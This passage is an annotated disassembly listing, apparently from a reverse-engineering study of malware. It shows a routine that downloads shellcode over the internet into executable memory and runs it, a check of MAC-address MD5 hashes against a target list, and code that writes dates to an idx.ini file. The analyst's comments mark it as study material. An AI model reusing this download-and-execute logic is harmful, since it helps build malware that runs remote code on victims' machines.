ram:000004bb 51 PUSH ECX
ram:000004bc 50 PUSH hInternet
ram:000004bd ff5648 CALL dword ptr [ESI + func_ptrs->InternetO...
ram:000004c0 894508 MOV dword ptr [EBP +...,hInternet
ram:000004c3 3bc3 CMP hInternet,EBX
ram:000004c5 7462 JZ LAB_00000529
ram:000004c7 6a40 PUSH PAGE_EXECUTE_READWRITE
ram:000004c9 6800100000 PUSH MEM_COMMIT
ram:000004ce 6800005000 PUSH 0x500000
ram:000004d3 53 PUSH EBX
;allocate a buffer to download shellcode into
ram:000004d4 ff5604 CALL dword ptr [ESI + func_ptrs->VirtualAl...
ram:000004d7 8bf8 MOV __dest,buffer
ram:000004d9 eb1f JMP LAB_000004fa
LAB_000004db: ;XREF[1,0]: 0000050c
ram:000004db 8d45e8 LEA buffer=>num_bytes_read,[EBP + -0x18]
ram:000004de 50 PUSH buffer
ram:000004df ff75fc PUSH dword ptr [EBP + num_bytes_available+...
ram:000004e2 895de8 MOV dword ptr [EBP + num_bytes_read+0x4],EBX
ram:000004e5 8b07 MOV buffer,dword ptr [__dest]
ram:000004e7 8d443808 LEA buffer,[buffer + __dest*0x1 + 0x8]
ram:000004eb 50 PUSH buffer
ram:000004ec ff7508 PUSH dword ptr [EBP + md5s_of_thismachine+...
;download shellcode
ram:000004ef ff5650 CALL dword ptr [ESI + func_ptrs->InternetR...
ram:000004f2 8b45e8 MOV buffer,dword ptr [EBP + num_bytes_rea...
ram:000004f5 0107 ADD dword ptr [__dest],buffer
ram:000004f7 115f04 ADC dword ptr [__dest + 0x4],EBX
LAB_000004fa: ;XREF[1,0]: 000004d9
ram:000004fa 53 PUSH EBX
ram:000004fb 53 PUSH EBX
ram:000004fc 8d45fc LEA buffer=>num_bytes_available,[EBP + -0x4]
ram:000004ff 50 PUSH buffer
ram:00000500 ff7508 PUSH dword ptr [EBP + md5s_of_thismachine+...
ram:00000503 895dfc MOV dword ptr [EBP +...,EBX
ram:00000506 ff564c CALL dword ptr [ESI + func_ptrs->InternetQ...
ram:00000509 395dfc CMP dword ptr [EBP +...,EBX
ram:0000050c 75cd JNZ LAB_000004db
ram:0000050e 57 PUSH __dest
ram:0000050f 56 PUSH func_ptrs
;execute the downloaded shellcode
ram:00000510 8d4708 LEA buffer,[__dest + 0x8]
ram:00000513 ffd0 CALL buffer
ram:00000515 59 POP ECX
ram:00000516 59 POP ECX
ram:00000517 3bfb CMP __dest,EBX
ram:00000519 740e JZ LAB_00000529
ram:0000051b 6800400000 PUSH DAT_00004000 ;= C9h
ram:00000520 6800005000 PUSH 0x500000
ram:00000525 57 PUSH __dest
ram:00000526 ff5618 CALL dword ptr [ESI + func_ptrs->VirtualFree]
LAB_00000529: ;XREF[3,0]: 000004ab,000004c5,00000519
ram:00000529 5f POP __dest
ram:0000052a 5b POP EBX
ram:0000052b c9 LEAVE
ram:0000052c c20400 RET 0x4
;********************************************************************************************************
;* Compare the MD5s in `buffer` with the ones in `md5s_of_macs` if they match copy the MD5s to `md5s_of_...*
;* in case they don't match return 0 *
;********************************************************************************************************
;int cmp_md5(func_ptr_table_t * func_ptrs, int * md5s_of_macs, void * buffer, uint cnt, mac_md5_list_entry_t * md5s_of_thismachine)
;func_ptrs func_ptr_ta... 4 ;XREF[4,0]: 0000056e,000005c4,000005f4,00000630
;md5s_of_macs int * 8 ;XREF[2,0]: 00000535,00000636
;buffer void * c ;XREF[3,0]: 00000564,000005ba,000005ea
;cnt uint 10 ;XREF[6,0]: 0000055f,00000584,000005b5,000005d5,000005e5
; 00000605
;md5s_of_th... mac_md5_lis... 14 ;XREF[1,0]: 0000063c
;local_8 undefined4 -8 ;XREF[5,0]: 0000053f,00000542,0000054f,000005a0,00000620
;local_c undefined4 -c ;XREF[6,0]: 0000055c,0000057b,0000057e,000005a7,000005dc
; 0000060c
;local_10 undefined4 -10 ;XREF[5,0]: 00000547,00000596,000005a3,00000612,00000619
;local_24 undefined1 -24 ;XREF[1,0]: 000005ef
;local_38 undefined1 -38 ;XREF[1,0]: 000005bf
;local_3c undefined1 -3c ;XREF[1,0]: 000005ae
;local_64 undefined1 -64 ;XREF[1,0]: 00000569
;local_68 undefined1 -68 ;XREF[1,0]: 00000555
;XREF[1,0]: 00000f87
ram:0000052f 55 PUSH EBP
ram:00000530 8bec MOV EBP,ESP
ram:00000532 83ec64 SUB ESP,0x64
ram:00000535 8b450c MOV EAX,dword ptr [EBP + md5s_of_macs+0x4]
ram:00000538 53 PUSH EBX
ram:00000539 56 PUSH ESI
ram:0000053a 33f6 XOR ESI,ESI
ram:0000053c 57 PUSH EDI
ram:0000053d 33db XOR EBX,EBX
ram:0000053f 8945fc MOV dword ptr [EBP + local_8+0x4],EAX
LAB_00000542: ;XREF[1,0]: 00000628
ram:00000542 8b45fc MOV EAX,dword ptr [EBP + local_8+0x4]
ram:00000545 8b00 MOV EAX,dword ptr [EAX]
ram:00000547 8945f4 MOV dword ptr [EBP + local_10+0x4],EAX
ram:0000054a 83f801 CMP EAX,0x1
ram:0000054d 7547 JNZ LAB_00000596
ram:0000054f 8b75fc MOV ESI,dword ptr [EBP + local_8+0x4]
ram:00000552 6a0b PUSH 0xb
ram:00000554 59 POP ECX
ram:00000555 8d7d9c LEA EDI=>local_68,[EBP + -0x64]
ram:00000558 f3a5 MOVSD.REP ES:EDI,ESI
ram:0000055a 33f6 XOR ESI,ESI
ram:0000055c 2175f8 AND dword ptr [EBP + local_c+0x4],ESI
ram:0000055f 397514 CMP dword ptr [EBP + cnt+0x4],ESI
ram:00000562 762a JBE LAB_0000058e
ram:00000564 8b7d10 MOV EDI,dword ptr [EBP + buffer+0x4]
LAB_00000567: ;XREF[1,0]: 00000587
ram:00000567 6a10 PUSH 0x10
ram:00000569 8d45a0 LEA EAX=>local_64,[EBP + -0x60]
ram:0000056c 57 PUSH EDI
ram:0000056d 50 PUSH EAX
ram:0000056e 8b4508 MOV EAX,dword ptr [EBP + func_ptrs+0x4]
ram:00000571 ff5020 CALL dword ptr [EAX + 0x20]
ram:00000574 83c40c ADD ESP,0xc
ram:00000577 85c0 TEST EAX,EAX
ram:00000579 7410 JZ LAB_0000058b
ram:0000057b ff45f8 INC dword ptr [EBP + local_c+0x4]
ram:0000057e 8b45f8 MOV EAX,dword ptr [EBP + local_c+0x4]
ram:00000581 83c714 ADD EDI,0x14
ram:00000584 3b4514 CMP EAX,dword ptr [EBP + cnt+0x4]
ram:00000587 72de JC LAB_00000567
ram:00000589 eb03 JMP LAB_0000058e
LAB_0000058b: ;XREF[1,0]: 00000579
ram:0000058b 33f6 XOR ESI,ESI
ram:0000058d 46 INC ESI
LAB_0000058e: ;XREF[2,0]: 00000562,00000589
ram:0000058e 85f6 TEST ESI,ESI
ram:00000590 0f859a000000 JNZ LAB_00000630
LAB_00000596: ;XREF[1,0]: 0000054d
ram:00000596 837df402 CMP dword ptr [EBP + local_10+0x4],0x2
ram:0000059a 0f8580000000 JNZ LAB_00000620
ram:000005a0 8b75fc MOV ESI,dword ptr [EBP + local_8+0x4]
ram:000005a3 8365f400 AND dword ptr [EBP + local_10+0x4],0x0
ram:000005a7 8365f800 AND dword ptr [EBP + local_c+0x4],0x0
ram:000005ab 6a0b PUSH 0xb
ram:000005ad 59 POP ECX
ram:000005ae 8d7dc8 LEA EDI=>local_3c,[EBP + -0x38]
ram:000005b1 f3a5 MOVSD.REP ES:EDI,ESI
ram:000005b3 33f6 XOR ESI,ESI
ram:000005b5 397514 CMP dword ptr [EBP + cnt+0x4],ESI
ram:000005b8 7629 JBE LAB_000005e3
ram:000005ba 8b7d10 MOV EDI,dword ptr [EBP + buffer+0x4]
LAB_000005bd: ;XREF[1,0]: 000005d8
ram:000005bd 6a10 PUSH 0x10
ram:000005bf 8d45cc LEA EAX=>local_38,[EBP + -0x34]
ram:000005c2 57 PUSH EDI
ram:000005c3 50 PUSH EAX
ram:000005c4 8b4508 MOV EAX,dword ptr [EBP + func_ptrs+0x4]
ram:000005c7 ff5020 CALL dword ptr [EAX + 0x20]
ram:000005ca 83c40c ADD ESP,0xc
ram:000005cd 85c0 TEST EAX,EAX
ram:000005cf 740b JZ LAB_000005dc
ram:000005d1 46 INC ESI
ram:000005d2 83c714 ADD EDI,0x14
ram:000005d5 3b7514 CMP ESI,dword ptr [EBP + cnt+0x4]
ram:000005d8 72e3 JC LAB_000005bd
ram:000005da eb07 JMP LAB_000005e3
LAB_000005dc: ;XREF[1,0]: 000005cf
ram:000005dc c745f8010... MOV dword ptr [EBP + local_c+0x4],0x1
LAB_000005e3: ;XREF[2,0]: 000005b8,000005da
ram:000005e3 33ff XOR EDI,EDI
ram:000005e5 397d14 CMP dword ptr [EBP + cnt+0x4],EDI
ram:000005e8 762f JBE LAB_00000619
ram:000005ea 8b7510 MOV ESI,dword ptr [EBP + buffer+0x4]
LAB_000005ed: ;XREF[1,0]: 00000608
ram:000005ed 6a10 PUSH 0x10
ram:000005ef 8d45e0 LEA EAX=>local_24,[EBP + -0x20]
ram:000005f2 56 PUSH ESI
ram:000005f3 50 PUSH EAX
ram:000005f4 8b4508 MOV EAX,dword ptr [EBP + func_ptrs+0x4]
ram:000005f7 ff5020 CALL dword ptr [EAX + 0x20]
ram:000005fa 83c40c ADD ESP,0xc
ram:000005fd 85c0 TEST EAX,EAX
ram:000005ff 740b JZ LAB_0000060c
ram:00000601 47 INC EDI
ram:00000602 83c614 ADD ESI,0x14
ram:00000605 3b7d14 CMP EDI,dword ptr [EBP + cnt+0x4]
ram:00000608 72e3 JC LAB_000005ed
ram:0000060a eb0d JMP LAB_00000619
LAB_0000060c: ;XREF[1,0]: 000005ff
ram:0000060c 837df801 CMP dword ptr [EBP + local_c+0x4],0x1
ram:00000610 7507 JNZ LAB_00000619
ram:00000612 c745f4010... MOV dword ptr [EBP + local_10+0x4],0x1
LAB_00000619: ;XREF[3,0]: 000005e8,0000060a,00000610
ram:00000619 8b75f4 MOV ESI,dword ptr [EBP + local_10+0x4]
ram:0000061c 85f6 TEST ESI,ESI
ram:0000061e 7510 JNZ LAB_00000630
LAB_00000620: ;XREF[1,0]: 0000059a
ram:00000620 8345fc2c ADD dword ptr [EBP + local_8+0x4],0x2c
ram:00000624 43 INC EBX
ram:00000625 83fb12 CMP EBX,0x12
ram:00000628 0f8214ffffff JC LAB_00000542
ram:0000062e eb15 JMP LAB_00000645
LAB_00000630: ;XREF[2,0]: 00000590,0000061e
ram:00000630 8b4508 MOV EAX,dword ptr [EBP + func_ptrs+0x4]
ram:00000633 6bdb2c IMUL EBX,EBX,0x2c
ram:00000636 035d0c ADD EBX,dword ptr [EBP + md5s_of_macs+0x4]
ram:00000639 6a2c PUSH 0x2c
ram:0000063b 53 PUSH EBX
ram:0000063c ff7518 PUSH dword ptr [EBP + md5s_of_thismachine+...
ram:0000063f ff501c CALL dword ptr [EAX + 0x1c]
ram:00000642 83c40c ADD ESP,0xc
LAB_00000645: ;XREF[1,0]: 0000062e
ram:00000645 5f POP EDI
ram:00000646 8bc6 MOV EAX,ESI
ram:00000648 5e POP ESI
ram:00000649 5b POP EBX
ram:0000064a c9 LEAVE
ram:0000064b c3 RET
;********************************************************************************************************
;* FUNCTION *
;********************************************************************************************************
;void no_match(func_ptr_table_t * func_ptrs, int ebx, int edi)
;func_ptrs func_ptr_ta... ESI
;ebx int EBX
;edi int EDI
;lVar3 longlong EDX:... ;XREF[1,0]: 0000088c
;len DWORD EAX ;XREF[1,0]: 000007e8
;puVar2 undefined * EAX ;XREF[1,0]: 00000843
;__n size_t EDI
;i int -8 ;XREF[3,0]: 000007c7,0000080e,00000811
;len_1 uint -c ;XREF[4,0]: 000007f0,00000843,00000849,000008cf
;FStack16 uint -10 ;XREF[2,0]: 000008bc,000008cb
;b4 undefined -11
;b3 undefined -12
;b2 undefined -13
;b1 undefined -14
;puStack24 WCHAR * -18 ;XREF[4,0]: 00000804,0000083d,00000875,000008a2
;_Stack28 uint -1c ;XREF[2,0]: 0000086b,00000872
;a4 undefined -1d
;a3 undefined -1e
;a2 undefined -1f
;a1 undefined -20 ;XREF[1,0]: 000006cf
;appname WCHAR[8] -30 ;XREF[4,7]: 00000698,00000913,0000092c,00000945,0000069e
; 000006a7,000006b0,000006b5,000006bd,000006c2
; 000006c9
;keyname3 WCHAR[8] -40 ;XREF[2,7]: 0000079f,00000941,00000725,00000737,00000795
; 000007a3,000007a7,000007bf,000007c3
;keyname1 WCHAR[8] -50 ;XREF[2,7]: 000006d5,0000090f,000006d9,000006dd,000006e3
; 000006e9,000006ef,000006f6,000006fc
;idx_ini__s... WCHAR[8] -60 ;XREF[2,7]: 0000065c,0000082e,00000663,0000066a,00000671
; 00000678,0000067f,0000068c,00000692
;keyname2 WCHAR[8] -70 ;XREF[2,7]: 00000702,00000928,00000706,0000070a,00000710
; 00000716,0000071e,00000729,0000072f
;fmt_str WCHAR[14] -8c ;XREF[2,12]: 0000073e,000008ed,00000748,00000752,0000075c
; 00000766,0000076d,00000774,0000077b,00000782
; 00000789,00000790,00000799,000007b3
;sytemtime _SYSTEMTIME -9c ;XREF[3,2]: 0000085d,000008c4,000008e5,000008d5,000008dd
;string WCHAR[20] -c4 ;XREF[4,0]: 000008f4,00000908,00000921,0000093a
;filename WCHAR[260] -2cc ;XREF[6,0]: 000007d1,0000081f,0000084e,00000901,0000091a
; 00000933
;module_fil... WCHAR[260] -4d4 ;XREF[4,0]: 000007b7,000007e0,000007fb,00000818
;uVar2 undefined4 -4e0
;lpFilename LPWSTR -4e4
;uVar1 undefined4 -4e8
;lpSystemTi... LPFILETIME -4ec
;XREF[1,0]: 00000fa1
ram:0000064c 55 PUSH EBP
ram:0000064d 8bec MOV EBP,ESP
ram:0000064f 81ecd0040000 SUB ESP,0x4d0
ram:00000655 53 PUSH ebx
ram:00000656 57 PUSH edi
ram:00000657 6a69 PUSH 0x69
ram:00000659 58 POP EAX
ram:0000065a 6a64 PUSH 0x64
ram:0000065c 668945a4 MOV word ptr [EBP + ...,AX
ram:00000660 58 POP EAX
ram:00000661 6a78 PUSH 0x78
ram:00000663 668945a6 MOV word ptr [EBP + ...,AX
ram:00000667 58 POP EAX
ram:00000668 6a2e PUSH 0x2e
ram:0000066a 668945a8 MOV word ptr [EBP + ...,AX
ram:0000066e 58 POP EAX
ram:0000066f 6a69 PUSH 0x69
ram:00000671 668945aa MOV word ptr [EBP + ...,AX
ram:00000675 58 POP EAX
ram:00000676 6a6e PUSH 0x6e
ram:00000678 668945ac MOV word ptr [EBP + ...,AX
ram:0000067c 58 POP EAX
ram:0000067d 6a69 PUSH 0x69
ram:0000067f 668945ae MOV word ptr [EBP + ...,AX
ram:00000683 58 POP EAX
ram:00000684 6a49 PUSH 0x49
ram:00000686 59 POP ECX
ram:00000687 6a44 PUSH 0x44
ram:00000689 5f POP edi
ram:0000068a 6a58 PUSH 0x58
ram:0000068c 668945b0 MOV word ptr [EBP + ...,AX
ram:00000690 33c0 XOR EAX,EAX
ram:00000692 668945b2 MOV word ptr [EBP + ...,AX
ram:00000696 8bc1 MOV EAX,ECX
ram:00000698 668945d4 MOV word ptr [EBP + appname[0]+0x4],AX
ram:0000069c 8bc7 MOV EAX,edi
ram:0000069e 668945d6 MOV word ptr [EBP + appname[1]+0x4],AX
ram:000006a2 58 POP EAX
ram:000006a3 6a5f PUSH 0x5f
ram:000006a5 8bd0 MOV EDX,EAX
ram:000006a7 668955d8 MOV word ptr [EBP + appname[2]+0x4],DX
ram:000006ab 5a POP EDX
ram:000006ac 6a46 PUSH 0x46
ram:000006ae 8bda MOV ebx,EDX
ram:000006b0 66895dda MOV word ptr [EBP + appname[3]+0x4],ebx
ram:000006b4 5b POP ebx
ram:000006b5 66895ddc MOV word ptr [EBP + appname[4]+0x4],ebx
ram:000006b9 6a4c PUSH 0x4c
ram:000006bb 8bd9 MOV ebx,ECX
ram:000006bd 66895dde MOV word ptr [EBP + appname[5]+0x4],ebx
ram:000006c1 5b POP ebx
ram:000006c2 66895de0 MOV word ptr [EBP + appname[6]+0x4],ebx
ram:000006c6 6a45 PUSH 0x45
ram:000006c8 5b POP ebx
ram:000006c9 66895de2 MOV word ptr [EBP + appname[7]+0x4],ebx
ram:000006cd 33db XOR ebx,ebx
ram:000006cf 66895de4 MOV word ptr [EBP + a1+0x4],ebx
ram:000006d3 8bd8 MOV ebx,EAX
ram:000006d5 66895db4 MOV word ptr [EBP + keyname1[0]+0x4],ebx
ram:000006d9 66895db6 MOV word ptr [EBP + keyname1[1]+0x4],ebx
ram:000006dd 66895db8 MOV word ptr [EBP + keyname1[2]+0x4],ebx
ram:000006e1 8bda MOV ebx,EDX
ram:000006e3 66895dba MOV word ptr [EBP + keyname1[3]+0x4],ebx
ram:000006e7 8bd9 MOV ebx,ECX
ram:000006e9 66895dbc MOV word ptr [EBP + keyname1[4]+0x4],ebx
ram:000006ed 8bdf MOV ebx,edi
ram:000006ef 66895dbe MOV word ptr [EBP + keyname1[5]+0x4],ebx
ram:000006f3 6a4e PUSH 0x4e
ram:000006f5 5b POP ebx
ram:000006f6 66895dc0 MOV word ptr [EBP + keyname1[6]+0x4],ebx
ram:000006fa 33db XOR ebx,ebx
ram:000006fc 66895dc2 MOV word ptr [EBP + keyname1[7]+0x4],ebx
ram:00000700 8bd8 MOV ebx,EAX
ram:00000702 66895d94 MOV word ptr [EBP + keyname2[0]+0x4],ebx
ram:00000706 66895d96 MOV word ptr [EBP + keyname2[1]+0x4],ebx
ram:0000070a 66895d98 MOV word ptr [EBP + keyname2[2]+0x4],ebx
ram:0000070e 8bda MOV ebx,EDX
ram:00000710 66895d9a MOV word ptr [EBP + keyname2[3]+0x4],ebx
ram:00000714 8bd9 MOV ebx,ECX
ram:00000716 66895d9c MOV word ptr [EBP + keyname2[4]+0x4],ebx
ram:0000071a 8bdf MOV ebx,edi
ram:0000071c 6a45 PUSH 0x45
ram:0000071e 66895d9e MOV word ptr [EBP + keyname2[5]+0x4],ebx
ram:00000722 5b POP ebx
ram:00000723 6a25 PUSH 0x25
ram:00000725 668945d0 MOV word ptr [EBP + keyname3[6]+0x4],AX
ram:00000729 66895da0 MOV word ptr [EBP + keyname2[6]+0x4],ebx
ram:0000072d 33db XOR ebx,ebx
ram:0000072f 66895da2 MOV word ptr [EBP + keyname2[7]+0x4],ebx
ram:00000733 8bd8 MOV ebx,EAX
ram:00000735 33c0 XOR EAX,EAX
ram:00000737 668945d2 MOV word ptr [EBP + keyname3[7]+0x4],AX
ram:0000073b 58 POP EAX
ram:0000073c 6a64 PUSH 0x64
ram:0000073e 66898578f... MOV word ptr [fmt_str[0]+0x4 + EBP],AX
ram:00000745 58 POP EAX
ram:00000746 6a2d PUSH 0x2d
ram:00000748 6689857af... MOV word ptr [fmt_str[1]+0x4 + EBP],AX
ram:0000074f 58 POP EAX
ram:00000750 6a25 PUSH 0x25
ram:00000752 6689857cf... MOV word ptr [fmt_str[2]+0x4 + EBP],AX
ram:00000759 58 POP EAX
ram:0000075a 6a2e PUSH 0x2e
ram:0000075c 6689857ef... MOV word ptr [fmt_str[3]+0x4 + EBP],AX
ram:00000763 58 POP EAX
ram:00000764 6a32 PUSH 0x32
ram:00000766 66894580 MOV word ptr [EBP + fmt_str[4]+0x4],AX
ram:0000076a 58 POP EAX
ram:0000076b 6a64 PUSH 0x64
ram:0000076d 66894582 MOV word ptr [EBP + fmt_str[5]+0x4],AX
ram:00000771 58 POP EAX
ram:00000772 6a2d PUSH 0x2d
ram:00000774 66894584 MOV word ptr [EBP + fmt_str[6]+0x4],AX
ram:00000778 58 POP EAX
ram:00000779 6a25 PUSH 0x25
ram:0000077b 66894586 MOV word ptr [EBP + fmt_str[7]+0x4],AX
ram:0000077f 58 POP EAX
ram:00000780 6a2e PUSH 0x2e
ram:00000782 66894588 MOV word ptr [EBP + fmt_str[8]+0x4],AX
ram:00000786 58 POP EAX
ram:00000787 6a32 PUSH 0x32
ram:00000789 6689458a MOV word ptr [EBP + fmt_str[9]+0x4],AX
ram:0000078d 58 POP EAX
ram:0000078e 6a64 PUSH 0x64
ram:00000790 6689458c MOV word ptr [EBP + fmt_str[10]+0x4],AX
ram:00000794 58 POP EAX
ram:00000795 66897dce MOV word ptr [EBP + keyname3[5]+0x4],edi
ram:00000799 6689458e MOV word ptr [EBP + fmt_str[11]+0x4],AX
ram:0000079d 33c0 XOR EAX,EAX
ram:0000079f 66895dc4 MOV word ptr [EBP + keyname3[0]+0x4],ebx
ram:000007a3 66895dc6 MOV word ptr [EBP + keyname3[1]+0x4],ebx
ram:000007a7 66895dc8 MOV word ptr [EBP + keyname3[2]+0x4],ebx
ram:000007ab bf04010000 MOV edi,0x104
ram:000007b0 33db XOR ebx,ebx
ram:000007b2 57 PUSH edi
ram:000007b3 66894590 MOV word ptr [EBP + fmt_str[12]+0x4],AX
ram:000007b7 8d8530fbffff LEA EAX=>module_filename,[0xfffffb30 + EBP]
ram:000007bd 53 PUSH ebx
ram:000007be 50 PUSH EAX
ram:000007bf 668955ca MOV word ptr [EBP + keyname3[3]+0x4],DX
ram:000007c3 66894dcc MOV word ptr [EBP + keyname3[4]+0x4],CX
ram:000007c7 895dfc MOV dword ptr [EBP + i+0x4],ebx
ram:000007ca ff5624 CALL dword ptr [ESI + func_ptrs->memset]
ram:000007cd 83c40c ADD ESP,0xc
ram:000007d0 57 PUSH edi
ram:000007d1 8d8538fdffff LEA EAX=>filename,[0xfffffd38 + EBP]
ram:000007d7 53 PUSH ebx
ram:000007d8 50 PUSH EAX
ram:000007d9 ff5624 CALL dword ptr [ESI + func_ptrs->memset]
ram:000007dc 83c40c ADD ESP,0xc
ram:000007df 57 PUSH edi
ram:000007e0 8d8530fbffff LEA EAX=>module_filename,[0xfffffb30 + EBP]
ram:000007e6 50 PUSH EAX
ram:000007e7 53 PUSH ebx
ram:000007e8 ff5608 CALL dword ptr [ESI + func_ptrs->GetModule...
ram:000007eb 3bc3 CMP len,ebx
ram:000007ed 745f JZ LAB_0000084e
ram:000007ef 48 DEC len
ram:000007f0 8945f8 MOV dword ptr [EBP + len_1+0x4],len
ram:000007f3 3bc3 CMP len,ebx
ram:000007f5 7c57 JL LAB_0000084e
ram:000007f7 8d7c0002 LEA edi,[EAX + EAX*0x1 + 0x2]
ram:000007fb 8d8530fbffff LEA len=>module_filename,[0xfffffb30 + EBP]
ram:00000801 83e802 SUB len,0x2
ram:00000804 8945ec MOV dword ptr [EBP + puStack24+0x4],len
LAB_00000807: ;XREF[1,0]: 0000084c
ram:00000807 66833c385c CMP word ptr [len + edi*0x1],0x5c
ram:0000080c 7535 JNZ LAB_00000843
ram:0000080e ff45fc INC dword ptr [EBP + i+0x4]
ram:00000811 837dfc03 CMP dword ptr [EBP + i+0x4],0x3
ram:00000815 752c JNZ LAB_00000843
ram:00000817 57 PUSH edi
ram:00000818 8d8530fbffff LEA len=>module_filename,[0xfffffb30 + EBP]
ram:0000081e 50 PUSH len
ram:0000081f 8d8538fdffff LEA len=>filename,[0xfffffd38 + EBP]
ram:00000825 50 PUSH len
ram:00000826 ff561c CALL dword ptr [ESI + func_ptrs->memcpy]
ram:00000829 83c40c ADD ESP,0xc
ram:0000082c 6a0e PUSH 0xe
ram:0000082e 8d45a4 LEA len=>idx_ini__string,[EBP + -0x5c]
ram:00000831 50 PUSH len
ram:00000832 8d843d38f... LEA len,[0xfffffd38 + EBP + edi*0x1]
ram:00000839 50 PUSH len
ram:0000083a ff561c CALL dword ptr [ESI + func_ptrs->memcpy]
ram:0000083d 8b45ec MOV len,dword ptr [EBP + puStack24+0x4]
ram:00000840 83c40c ADD ESP,0xc
LAB_00000843: ;XREF[2,0]: 0000080c,00000815
ram:00000843 ff4df8 DEC dword ptr [EBP + len_1+0x4]
ram:00000846 83ef02 SUB EDI,0x2
ram:00000849 395df8 CMP dword ptr [EBP + len_1+0x4],ebx
ram:0000084c 7db9 JGE LAB_00000807
LAB_0000084e: ;XREF[2,0]: 000007ed,000007f5
ram:0000084e 66399d38f... CMP word ptr [filename[0]+0x4 + EBP],ebx
ram:00000855 0f86f1000000 JBE LAB_0000094c
ram:0000085b 6a10 PUSH 0x10
ram:0000085d 8d8568ffffff LEA puVar2=>sytemtime,[0xffffff68 + EBP]
ram:00000863 53 PUSH ebx
ram:00000864 50 PUSH puVar2
ram:00000865 ff5624 CALL dword ptr [ESI + func_ptrs->memset]
ram:00000868 83c40c ADD ESP,0xc
ram:0000086b 8d45e8 LEA puVar2=>_Stack28,[EBP + -0x18]
ram:0000086e 50 PUSH puVar2
ram:0000086f ff5610 CALL dword ptr [ESI + func_ptrs->GetSystem...
ram:00000872 8b45e8 MOV puVar2,dword ptr [EBP + _Stack28+0x4]
ram:00000875 8b4dec MOV ECX,dword ptr [EBP + puStack24+0x4]
ram:00000878 53 PUSH ebx
ram:00000879 050080c12a ADD puVar2,0x2ac18000
ram:0000087e bf80969800 MOV __n,0x989680
ram:00000883 57 PUSH __n
ram:00000884 81d1214e62fe ADC ECX,0xfe624e21
ram:0000088a 51 PUSH ECX
ram:0000088b 50 PUSH puVar2
ram:0000088c e8cf4b0000 CALL FUN_00005460 ;undefined FUN_00005460()
ram:00000891 83fa07 CMP lVar3,0x7
ram:00000894 7c0f JL LAB_000008a5
ram:00000896 7f07 JG LAB_0000089f
ram:00000898 3dff6f4093 CMP lVar3,0x93406fff
ram:0000089d 7606 JBE LAB_000008a5
LAB_0000089f: ;XREF[1,0]: 00000896
ram:0000089f 83c8ff OR lVar3,0xffffffff
ram:000008a2 8945ec MOV dword ptr [EBP + puStack24+0x4],lVar3
LAB_000008a5: ;XREF[2,0]: 00000894,0000089d
ram:000008a5 05803a0900 ADD lVar3,0x93a80
ram:000008aa 99 CDQ
ram:000008ab 53 PUSH ebx=>DAT_00006aed ;= 1Ah
ram:000008ac 05009110b6 ADD lVar3,0xb6109100
ram:000008b1 57 PUSH __n=>DAT_00006ae9 ;= D6h
ram:000008b2 83d202 ADC lVar3,0x2
ram:000008b5 52 PUSH lVar3=>DAT_00006ae5 ;= 52h R
ram:000008b6 50 PUSH lVar3=>DAT_00006ae1 ;= 09h
;here a function with just a `ret` opcode in it is called ... the question is why?
ram:000008b7 e8144c0000 CALL just_a_return_but_why ;undefined just_a_return_but_why()
ram:000008bc 8945f4 MOV dword ptr [EBP + FStack16+0x4],lVar3
ram:000008bf 8bc2 MOV lVar3,lVar3
ram:000008c1 c1f81f SAR lVar3,0x1f
ram:000008c4 8d8568ffffff LEA lVar3=>sytemtime,[0xffffff68 + EBP]
ram:000008ca 50 PUSH lVar3=>DAT_00006add ;= D6h
ram:000008cb 8d45f4 LEA lVar3=>FStack16,[EBP + -0xc]
ram:000008ce 50 PUSH lVar3=>DAT_00006ad9 ;= B4h
ram:000008cf 8955f8 MOV dword ptr [EBP + len_1+0x4],lVar3
ram:000008d2 ff5614 CALL dword ptr [ESI + func_ptrs->FileTimeT...
ram:000008d5 0fb7856ef... MOVZX lVar3,word ptr [sytemtime.wDay+0x4 + ...
ram:000008dc 50 PUSH lVar3
ram:000008dd 0fb7856af... MOVZX lVar3,word ptr [sytemtime.wMonth+0x4 ...
ram:000008e4 50 PUSH lVar3
ram:000008e5 0fb78568f... MOVZX lVar3,word ptr [sytemtime.wYear+0x4 +...
ram:000008ec 50 PUSH lVar3
ram:000008ed 8d8578ffffff LEA lVar3=>fmt_str,[0xffffff78 + EBP]
ram:000008f3 50 PUSH lVar3
ram:000008f4 8d8540ffffff LEA lVar3=>string,[0xffffff40 + EBP]
ram:000008fa 50 PUSH lVar3
ram:000008fb ff5628 CALL dword ptr [ESI + func_ptrs->swprintf]
ram:000008fe 83c414 ADD ESP,0x14
ram:00000901 8d8538fdffff LEA lVar3=>filename,[0xfffffd38 + EBP]
ram:00000907 50 PUSH lVar3
ram:00000908 8d8540ffffff LEA lVar3=>string,[0xffffff40 + EBP]
ram:0000090e 50 PUSH lVar3
ram:0000090f 8d45b4 LEA lVar3=>keyname1,[EBP + -0x4c]
ram:00000912 50 PUSH lVar3
;here the some stuff is written into `idx.ini`
ram:00000913 8d45d4 LEA lVar3=>appname,[EBP + -0x2c]
ram:00000916 50 PUSH lVar3
ram:00000917 ff560c CALL dword ptr [ESI + func_ptrs->WritePriv...
ram:0000091a 8d8538fdffff LEA lVar3=>filename,[0xfffffd38 + EBP]
ram:00000920 50 PUSH lVar3
ram:00000921 8d8540ffffff LEA lVar3=>string,[0xffffff40 + EBP]
ram:00000927 50 PUSH lVar3
ram:00000928 8d4594 LEA lVar3=>keyname2,[EBP + -0x6c]
ram:0000092b 50 PUSH lVar3
ram:0000092c 8d45d4 LEA lVar3=>appname,[EBP + -0x2c]
ram:0000092f 50 PUSH lVar3
ram:00000930 ff560c CALL dword ptr [ESI + func_ptrs->WritePriv...
ram:00000933 8d8538fdffff LEA lVar3=>filename,[0xfffffd38 + EBP]
ram:00000939 50 PUSH lVar3
ram:0000093a 8d8540ffffff LEA lVar3=>string,[0xffffff40 + EBP]
ram:00000940 50 PUSH lVar3
ram:00000941 8d45c4 LEA lVar3=>keyname3,[EBP + -0x3c]
ram:00000944 50 PUSH lVar3
ram:00000945 8d45d4 LEA lVar3=>appname,[EBP + -0x2c]
ram:00000948 50 PUSH lVar3
ram:00000949 ff560c CALL dword ptr [ESI + func_ptrs->WritePriv...
LAB_0000094c: ;XREF[1,0]: 00000855
ram:0000094c 5f POP __n
ram:0000094d 5b POP ebx
ram:0000094e c9 LEAVE
ram:0000094f c3 RET
;********************************************************************************************************
;* FUNCTION *
;********************************************************************************************************
;void payload(func_ptr_table_t * func_ptrs)
;func_ptrs func_ptr_ta... EAX
;mac_cnt int EAX ;XREF[1,0]: 00000f2a
;dwSize SIZE_T EDI ;XREF[1,0]: 00000f38
